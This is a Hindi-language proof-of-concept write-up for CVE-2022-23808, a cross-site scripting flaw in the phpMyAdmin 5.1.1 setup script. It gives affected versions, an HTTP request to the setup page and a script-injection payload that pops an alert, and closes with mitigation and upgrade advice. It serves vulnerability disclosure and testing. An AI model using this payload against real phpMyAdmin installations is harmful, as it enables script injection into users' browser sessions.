
CVE-2022-23808 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, phpMyAdmin 5.1.1 सेटअप स्क्रिप्ट में संग्रहीत XSS भेद्यता, सुरक्षा परीक्षण के लिए पेलोड और पुनरुत्पादन चरणों के साथ।
एक्सप्लॉइट शीर्षक : phpMyAdmin 5.1.1 - XSS (क्रॉस-साइट स्क्रिप्टिंग)
एक्सप्लॉइट लेखक : Dipak Panchal (@th3.d1p4k)
विक्रेता होमपेज : https://www.phpmyadmin.net
सॉफ्टवेयर लिंक : https://www.phpmyadmin.net/files/5.1.1/
प्रभावित संस्करण : phpMyAdmin 5.1 शाखा के 5.1.2 से पहले के संस्करण प्रभावित हैं।
परीक्षण किया गया : Windows 10 और Linux
CVE : CVE-2022-23808
संदर्भ : https://www.phpmyadmin.net/security/PMASA-2022-2/
कमजोरियों की एक श्रृंखला खोजी गई है जो एक हमलावर को सेटअप स्क्रिप्ट के कुछ पहलुओं में दुर्भावनापूर्ण कोड इंजेक्ट करने की अनुमति दे सकती है, जो XSS या HTML इंजेक्शन को सक्षम कर सकता है।
GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test HTTP/1.1
Host: 127.0.0.1:1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
">'><script>alert(document.domain)</script>

config.inc.php कॉन्फ़िगरेशन फ़ाइल वाली phpMyAdmin स्थापना सेटअप स्क्रिप्ट तक पहुँच की अनुमति नहीं देगी, जो बदले में इस हमले को कम करती है।
phpMyAdmin 5.1.2 या नए संस्करण में अपग्रेड करें या पैच लागू करें।